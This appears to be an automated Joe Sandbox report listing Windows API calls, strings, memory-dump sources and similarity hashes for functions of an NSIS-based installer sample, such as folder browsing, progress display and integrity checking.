Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: d25c713501a9bf653a1fcacbbfc2014aaa95160241b761f08358092e952fb18f
Instruction ID: 4ef5f1c50d251b73862b961a89edc9b2cc60572935cd21a4370a6936b8511f12
Opcode Fuzzy Hash: d25c713501a9bf653a1fcacbbfc2014aaa95160241b761f08358092e952fb18f
Instruction Fuzzy Hash: 5231F231201B15ABD2206B659D4DF6B3A6CDF86754F14053FFA01F62D2EA3CE8058EAD

Function 0040450D Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040455C
SetWindowTextA.USER32(00000000,?), ref: 00404586
SHBrowseForFolderA.SHELL32(?,0079E920,?), ref: 00404637
CoTaskMemFree.OLE32(00000000), ref: 00404642
lstrcmpiA.KERNEL32(007A1EE0,0079F548), ref: 00404674
lstrcatA.KERNEL32(?,007A1EE0), ref: 00404680
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404692

Part of subcall function 004056ED: GetDlgItemTextA.USER32(?,?,00000400,004046C9), ref: 00405700

Part of subcall function 00406257: CharNextA.USER32(?,*?|<>/":,00000000,007A9000,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
Part of subcall function 00406257: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
Part of subcall function 00406257: CharNextA.USER32(?,007A9000,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
Part of subcall function 00406257: CharPrevA.USER32(?,?,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062D1

GetDiskFreeSpaceA.KERNEL32(0079E518,?,?,0000040F,?,0079E518,0079E518,?,00000001,0079E518,?,?,000003FB,?), ref: 00404750
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040476B

Part of subcall function 004048C4: lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
Part of subcall function 004048C4: wsprintfA.USER32 ref: 0040496A
Part of subcall function 004048C4: SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D

Strings

A, xrefs: 00404630

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: 67040a0a49a64ce828be965077cda0b708920273d8bfda1b546e689113884970
Instruction ID: c53a8e09cffb511e2e8442f8e0ee4109053d5ca2156788ad792cf5210b9728ca
Opcode Fuzzy Hash: 67040a0a49a64ce828be965077cda0b708920273d8bfda1b546e689113884970
Instruction Fuzzy Hash: F4A17FB1900209ABDB11AFA5CD45AAFB7B8EF85314F14843BF601B62D1D77C8A418F69

Function 0040600F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(007A1EE0,00000400), ref: 0040613A
GetWindowsDirectoryA.KERNEL32(007A1EE0,00000400,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 0040614D
SHGetSpecialFolderLocation.SHELL32(LQ@(y,?,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 00406189
SHGetPathFromIDListA.SHELL32(?,007A1EE0), ref: 00406197
CoTaskMemFree.OLE32(?), ref: 004061A3
lstrcatA.KERNEL32(007A1EE0,\Microsoft\Internet Explorer\Quick Launch), ref: 004061C7
lstrlenA.KERNEL32(007A1EE0,?,0079ED28,00000000,0040514C,0079ED28,?), ref: 00406219

Strings

., xrefs: 004060D5
LQ@(y, xrefs: 0040617F, 0040616B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004061C1
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406109

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: .$LQ@(y$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-3515046496
Opcode ID: 355b90f3f401d120c3d4b6cf139cfaaf503aaee0dfbae073ec691654466f74a4
Instruction ID: d98bd44868bde6ace230f91b8fcf6596fc401970515ead307cdfb18f28ae641c
Opcode Fuzzy Hash: 355b90f3f401d120c3d4b6cf139cfaaf503aaee0dfbae073ec691654466f74a4
Instruction Fuzzy Hash: EE61F471904111AEDF11AF68CC84B7E3BA49B56314F16817FE903BA2D2C73C49A2CB4E

Function 00405114 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0079ED28), ref: 0040514D
lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

Strings

(y, xrefs: 00405134

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: (y
API String ID: 2531174081-255812342
Opcode ID: 95f89131369c21242812949e714cdf1864596966d358f4f3b94d925066a10f3f
Instruction ID: bffe320471bb4ed621b5b80758aa42b14eae6e2fc0b22327473978c148379bdd
Opcode Fuzzy Hash: 95f89131369c21242812949e714cdf1864596966d358f4f3b94d925066a10f3f
Instruction Fuzzy Hash: 06219D71D00518BBDF119FA9CD80ADEBFB9EF05358F10807AF904B6291C6388E418FA8

Function 004040E2 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040FF
GetSysColor.USER32(00000000), ref: 0040413D
SetTextColor.GDI32(?,00000000), ref: 00404149
SetBkMode.GDI32(?,?), ref: 00404155
GetSysColor.USER32(?), ref: 00404168
SetBkColor.GDI32(?,?), ref: 00404178
DeleteObject.GDI32(?), ref: 00404192
CreateBrushIndirect.GDI32(?), ref: 0040419C

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction ID: 7e7a0635a9a9ad053635d0a61e184563e53fd5caf941e55c08cb8fd0a55be6c0
Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction Fuzzy Hash: 312195715007049BD7309F68DD0CB5BBBF4AF91710B048A2EEA96A62E4C738D894CB54

Function 00402E52 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000020), ref: 00402F73
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,000000FF,00000000,00000000,?,?), ref: 00402FD9

Part of subcall function 00402D60: DestroyWindow.USER32(?,00000000,00402F3E,00000001), ref: 00402D73

Strings

Inst, xrefs: 00402EA9
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
Null, xrefs: 00402EBB
soft, xrefs: 00402EB2

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: AllocDestroyFileGlobalPointerWindow
String ID: Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 1580554587-639894862
Opcode ID: aa602fcc84524977c216627ed963f5b7eedb9863e13b54dad4ba2881f4455998
Instruction ID: a92ccb9d8f619cb80c5c611e8c8ba1d2dc739ca40880e943336e7b39007ee354
Opcode Fuzzy Hash: aa602fcc84524977c216627ed963f5b7eedb9863e13b54dad4ba2881f4455998
Instruction Fuzzy Hash: 7E41C731900216AFDF109F64DA89B9E7B74EB54395F10403BE904B62D1C6BC9E81AB5D

Function 004049CE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049E9
GetMessagePos.USER32 ref: 004049F1
ScreenToClient.USER32(?,?), ref: 00404A0B
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A1D
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A43

Strings

f, xrefs: 00404A1F

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction ID: eb4189dc51e804bfd071b7650a20f4023a9ce92a25ebde304762d3f5d63b5794
Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction Fuzzy Hash: A7019271E40218BADB00DB94DD81FFEBBBCAF55711F10012BBA00B61C0C7B455018F94

Function 00402CDD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
MulDiv.KERNEL32(?,00000064,?), ref: 00402D23
wsprintfA.USER32 ref: 00402D33
SetWindowTextA.USER32(?,?), ref: 00402D43
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55

Strings

verifying installer: %d%%, xrefs: 00402D2D

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3fa44f4dc9fa044fa0817cfcd5774d0a0628888693fe37db565f4c7dda636c4b
Instruction ID: 93681796157c975abd13c8aaf7f83402805495348c169d35143c581ed88c076c
Opcode Fuzzy Hash: 3fa44f4dc9fa044fa0817cfcd5774d0a0628888693fe37db565f4c7dda636c4b
Instruction Fuzzy Hash: 3001FF71640209BBEF109F60DE4AFEE3769EB04345F00803AFA16B51D0DBB999568F59

Function 00406317 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
wsprintfA.USER32 ref: 00406367
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040637B

Strings

%s%s.dll, xrefs: 00406361
UXTHEME, xrefs: 00406320
\, xrefs: 0040633F

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction ID: 3c3b4468b6e1923fcac8586f88cca04ee8b9faba7420f287fa6fd57e775497b1
Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction Fuzzy Hash: B2F0FC70500609ABDB14ABA4DD0DFEB765CAB08304F14057AA987E10C1D678E4358B98

Function 004027A3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
GlobalFree.KERNEL32(?), ref: 0040284C
GlobalFree.KERNEL32(00000000), ref: 0040285F
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 1c4e212e70d4ab499562e1bbfea3cb77a95e3aeab3a40a8059386cf64e629151
Instruction ID: 0817f1a76f2754a18340a64afdb33fa8ea80ebf39b88600e0ebdbe9b4451bd6d
Opcode Fuzzy Hash: 1c4e212e70d4ab499562e1bbfea3cb77a95e3aeab3a40a8059386cf64e629151
Instruction Fuzzy Hash: C3217C71C00124ABDF217FA9CD49DAE7F79EF09364B10823AF520762E1CA7959429F98

Function 00403011 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403062
GetTickCount.KERNEL32 ref: 004030E6
MulDiv.KERNEL32(7FFFFFFF,00000064,00008000), ref: 0040310F
wsprintfA.USER32 ref: 0040311F

Strings

... %d%%, xrefs: 00403119

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: d8555fc8ee8eebe5e1385490a15005a1120c1f3db5c195ab1ba9caa7eaa386d0
Instruction ID: 58bd5faada6d9be10f0d72f5de6cba59a90cc667517f98c73a934b571b6f9a01
Opcode Fuzzy Hash: d8555fc8ee8eebe5e1385490a15005a1120c1f3db5c195ab1ba9caa7eaa386d0
Instruction Fuzzy Hash: 23414F71900209EBCB10DF65DA4479E7BB8EF08756F14813BE911BA2E0C7799B41CB9D

Function 0040206A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00402095

Part of subcall function 00405114: lstrlenA.KERNEL32(0079ED28), ref: 0040514D
Part of subcall function 00405114: lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
Part of subcall function 00405114: lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
Part of subcall function 00405114: SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020A5
GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F

Strings

/z, xrefs: 004020DF

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: /z
API String ID: 2987980305-1190999251
Opcode ID: 3fd0063a8d0343d73f9f38b3b5b404fd2864b338f3970c7514f5d7ace56161a2
Instruction ID: e61536644f3bf68f7d9d9aba667bc4080f9c9cd2ba15b67bd91c869db9746c0c
Opcode Fuzzy Hash: 3fd0063a8d0343d73f9f38b3b5b404fd2864b338f3970c7514f5d7ace56161a2
Instruction Fuzzy Hash: 6521C671900214ABCF11BFA4CF89AAE7AB4AF45318F20413BF601B62D1D6FD4982965E

Function 00406257 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,007A9000,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
CharNextA.USER32(?,007A9000,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
CharPrevA.USER32(?,?,76F93410,007AA400,00000000,00403223,007AA400,007AA400,0040345A,?,00000006,00000008,0000000A), ref: 004062D1

Strings

*?|<>/":, xrefs: 0040629F

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
Instruction ID: c458f316ef597d28f2da60d7b579c442bef5f501f0b3efb69703b1c7b5c33328
Opcode Fuzzy Hash: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
Instruction Fuzzy Hash: 2211E25180479129FB3226280C44FB77F984B9B770F1901BFD4C6722C2C67C5CA6826D

Function 00401759 Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00000000,00000000,0040A3E8,007A9800,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,0040A3E8,0040A3E8,00000000,00000000,0040A3E8,007A9800,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA

Part of subcall function 00405114: lstrlenA.KERNEL32(0079ED28), ref: 0040514D
Part of subcall function 00405114: lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
Part of subcall function 00405114: lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
Part of subcall function 00405114: SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: befae6215051d99b1ab4657fec02d01645aab5403196addd19f17b420424e560
Instruction ID: 0c6c4ee3c8c955c352dd186891d8ef18ee81d47802e2f4eda18a4991a1bfe0dc
Opcode Fuzzy Hash: befae6215051d99b1ab4657fec02d01645aab5403196addd19f17b420424e560
Instruction Fuzzy Hash: D841B471900515BACB10BBB5CD46D9F36B9DF45328B20823FF522F20E2D67C8A519A6E

Function 00401D41 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D58
GetClientRect.USER32(?,?), ref: 00401D9F
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
DeleteObject.GDI32(00000000), ref: 00401DF4

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 2bae10b4ae33dfedca707cc4008e68a37373c4f5b4a4a0668a98986923dff773
Instruction ID: 73b34c0ea56e2209ca6b10ab4d69fe2665be34d6bb8fccc5b8c3de89ec824b9e
Opcode Fuzzy Hash: 2bae10b4ae33dfedca707cc4008e68a37373c4f5b4a4a0668a98986923dff773
Instruction Fuzzy Hash: E8216672D00109AFDB05DF98DE44AEE7BB5FB48300F10407AF945F62A1CB789941CB58

Function 00401DFF Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E02
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
ReleaseDC.USER32(?,00000000), ref: 00401E35
CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E84

Memory Dump Source

Source File: 00000005.00000002.2722126661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2722108023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722146809.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722161417.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2722302983.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 05f1e8dbd8d2bd980b19a9bf60f2e06b7196c972b172c4b5c644a34e8c2871d7
Instruction ID: 7256709fe02f9cd86de6692cc41f874bddf10922414536e302f1c0253df40f98
Opcode Fuzzy Hash: 05f1e8dbd8d2bd980b19a9bf60f2e06b7196c972b172c4b5c644a34e8c2871d7
Instruction Fuzzy Hash: 3901B571900342AFE7019BB1AE49B997FB4EB55304F104439F251BB1E3CBB800059B6D

Function 00405A1E Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,00000000,?,?,004015CA,00000000,000000F0), ref: 00405A2C
CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A31
CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A45

Strings

\, xrefs: 00405A3E
